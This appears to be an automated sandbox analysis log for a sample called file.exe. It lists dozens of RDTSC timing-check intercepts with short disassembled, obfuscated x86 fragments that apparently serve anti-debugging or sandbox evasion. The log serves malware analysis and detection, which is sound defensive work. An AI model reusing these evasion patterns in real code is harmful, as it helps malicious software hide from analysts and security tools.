                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B12BD second address: 13B1364 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0F0527E406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F0F0527E408h 0x00000010 popad 0x00000011 nop 0x00000012 adc edi, 4C01FE11h 0x00000018 push esi 0x00000019 mov edi, dword ptr [ebp+122D1F9Ah] 0x0000001f pop esi 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007F0F0527E408h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Bh 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c call 00007F0F0527E40Bh 0x00000041 pop edi 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007F0F0527E408h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 0000001Dh 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e mov edi, 77939EEFh 0x00000063 mov si, DEFDh 0x00000067 xchg eax, ebx 0x00000068 jmp 00007F0F0527E411h 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007F0F0527E40Dh 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B1364 second address: 13B136A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B2A2C second address: 13B2A3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B2A3D second address: 13B2A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C405 second address: 136C419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0F0527E40Bh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C419 second address: 136C430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD323h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C430 second address: 136C445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0F0527E40Dh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C445 second address: 136C457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F0F04CBD316h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C457 second address: 136C4B1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F0527E406h 0x00000008 jp 00007F0F0527E406h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 jmp 00007F0F0527E412h 0x00000016 jmp 00007F0F0527E413h 0x0000001b pop ebx 0x0000001c jmp 00007F0F0527E40Fh 0x00000021 pushad 0x00000022 jmp 00007F0F0527E40Fh 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B4BA4 second address: 13B4BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B4BA8 second address: 13B4BAE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B70AF second address: 13B70C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F04CBD31Dh 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B70C5 second address: 13B70CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B70CB second address: 13B70D5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F04CBD316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA9B3 second address: 13BA9C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F0F0527E406h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA9C5 second address: 13BA9C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAF34 second address: 13BAF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAF38 second address: 13BAF3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAF3C second address: 13BAF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAF42 second address: 13BAFD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F0F04CBD318h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jl 00007F0F04CBD31Ch 0x0000002c mov edi, dword ptr [ebp+122D39E0h] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F0F04CBD318h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e add bx, 372Fh 0x00000053 pushad 0x00000054 mov edi, dword ptr [ebp+122D2378h] 0x0000005a mov eax, dword ptr [ebp+122D57FBh] 0x00000060 popad 0x00000061 push 00000000h 0x00000063 push ecx 0x00000064 push esi 0x00000065 mov dword ptr [ebp+1248114Dh], esi 0x0000006b pop ebx 0x0000006c pop edi 0x0000006d push eax 0x0000006e je 00007F0F04CBD324h 0x00000074 pushad 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BBF4A second address: 13BBF9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F0F0527E408h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 stc 0x00000026 push 00000000h 0x00000028 movzx ebx, dx 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D2598h], ebx 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0F0527E412h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BC142 second address: 13BC200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F04CBD323h 0x0000000b popad 0x0000000c nop 0x0000000d mov ebx, dword ptr [ebp+122D3A40h] 0x00000013 jmp 00007F0F04CBD320h 0x00000018 push dword ptr fs:[00000000h] 0x0000001f cld 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F0F04CBD318h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 mov eax, dword ptr [ebp+122D0D85h] 0x00000047 push 00000000h 0x00000049 push eax 0x0000004a call 00007F0F04CBD318h 0x0000004f pop eax 0x00000050 mov dword ptr [esp+04h], eax 0x00000054 add dword ptr [esp+04h], 0000001Ch 0x0000005c inc eax 0x0000005d push eax 0x0000005e ret 0x0000005f pop eax 0x00000060 ret 0x00000061 jmp 00007F0F04CBD329h 0x00000066 sub ebx, dword ptr [ebp+122D1C8Bh] 0x0000006c push FFFFFFFFh 0x0000006e xor ebx, 4996BBB4h 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007F0F04CBD31Eh 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD01A second address: 13BD0BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 jmp 00007F0F0527E417h 0x0000000e nop 0x0000000f sbb edi, 2FF08F2Ah 0x00000015 push dword ptr fs:[00000000h] 0x0000001c cmc 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 sub dword ptr [ebp+1248D1F9h], ecx 0x0000002a mov eax, dword ptr [ebp+122D0E91h] 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F0F0527E408h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a mov ebx, dword ptr [ebp+122D1F76h] 0x00000050 xor dword ptr [ebp+122D2AA3h], edi 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push edx 0x0000005b call 00007F0F0527E408h 0x00000060 pop edx 0x00000061 mov dword ptr [esp+04h], edx 0x00000065 add dword ptr [esp+04h], 00000019h 0x0000006d inc edx 0x0000006e push edx 0x0000006f ret 0x00000070 pop edx 0x00000071 ret 0x00000072 movsx ebx, si 0x00000075 push eax 0x00000076 jp 00007F0F0527E424h 0x0000007c pushad 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BEF79 second address: 13BEF7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BEF7D second address: 13BEFBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F0527E40Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d je 00007F0F0527E40Ch 0x00000013 jnp 00007F0F0527E406h 0x00000019 jmp 00007F0F0527E419h 0x0000001e push ecx 0x0000001f push eax 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF78E second address: 13BF7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F04CBD328h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0F04CBD323h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF7C0 second address: 13BF7CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF7CD second address: 13BF7D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1689 second address: 13C16A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E417h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF7D1 second address: 13BF7DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C26E9 second address: 13C26F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C17EB second address: 13C17F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C17F1 second address: 13C17F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C18F8 second address: 13C1902 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1902 second address: 13C1908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1908 second address: 13C190C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C29CD second address: 13C29D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C7694 second address: 13C76A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F0F04CBD31Fh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C76A9 second address: 13C76AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C76AD second address: 13C76C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F04CBD322h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C76C9 second address: 13C771B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E417h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push esi 0x0000000b and edi, 4DA04C99h 0x00000011 pop ebx 0x00000012 push 00000000h 0x00000014 jo 00007F0F0527E407h 0x0000001a cmc 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F0F0527E408h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8816 second address: 13C881A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C881A second address: 13C881E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C984E second address: 13C98C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD325h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e call 00007F0F04CBD323h 0x00000013 mov dword ptr [ebp+122D30E4h], eax 0x00000019 pop edi 0x0000001a mov dword ptr [ebp+122D1A47h], edi 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007F0F04CBD318h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c pushad 0x0000003d cld 0x0000003e mov ecx, edx 0x00000040 popad 0x00000041 xchg eax, esi 0x00000042 jl 00007F0F04CBD320h 0x00000048 pushad 0x00000049 jl 00007F0F04CBD316h 0x0000004f push ecx 0x00000050 pop ecx 0x00000051 popad 0x00000052 push eax 0x00000053 pushad 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C98C8 second address: 13C98CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C98CE second address: 13C98DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F0F04CBD316h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CA9C2 second address: 13CA9C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CA9C6 second address: 13CAA53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F04CBD31Ah 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F0F04CBD318h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 sbb bx, BCB7h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F0F04CBD318h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a jns 00007F0F04CBD317h 0x00000050 mov dword ptr [ebp+122D1F36h], eax 0x00000056 push 00000000h 0x00000058 mov dword ptr [ebp+12480687h], eax 0x0000005e xchg eax, esi 0x0000005f jmp 00007F0F04CBD325h 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CAA53 second address: 13CAA5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CBBBF second address: 13CBBC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CBBC3 second address: 13CBC5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jg 00007F0F0527E411h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F0F0527E408h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 jmp 00007F0F0527E411h 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D2196h], edx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F0F0527E408h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 mov bx, di 0x00000055 mov dword ptr [ebp+122D2BC5h], esi 0x0000005b xchg eax, esi 0x0000005c jmp 00007F0F0527E413h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 jp 00007F0F0527E406h 0x0000006b pushad 0x0000006c popad 0x0000006d popad 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C89A4 second address: 13C89A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C89A9 second address: 13C89CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F0527E416h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C89CD second address: 13C89D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C89D1 second address: 13C89D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C48C0 second address: 13C48CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C48CA second address: 13C4929 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0F0527E406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007F0F0527E40Ah 0x00000011 push dword ptr fs:[00000000h] 0x00000018 add dword ptr [ebp+1248114Dh], edi 0x0000001e mov bl, F2h 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 movsx ebx, di 0x0000002a mov eax, dword ptr [ebp+122D0EBDh] 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F0F0527E408h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a push FFFFFFFFh 0x0000004c movzx edi, dx 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push edi 0x00000053 push ecx 0x00000054 pop ecx 0x00000055 pop edi 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C4929 second address: 13C492F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CBE5C second address: 13CBE62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D2588 second address: 13D25A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD324h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D25A3 second address: 13D25A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D25A9 second address: 13D25B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D25B2 second address: 13D25B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D25B8 second address: 13D25BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D2724 second address: 13D2729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D28B8 second address: 13D28C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0F04CBD316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D28C2 second address: 13D28D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d ja 00007F0F0527E406h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D2A28 second address: 13D2A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D2A2E second address: 13D2A34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5E70 second address: 13B5E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D77EC second address: 13D77F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
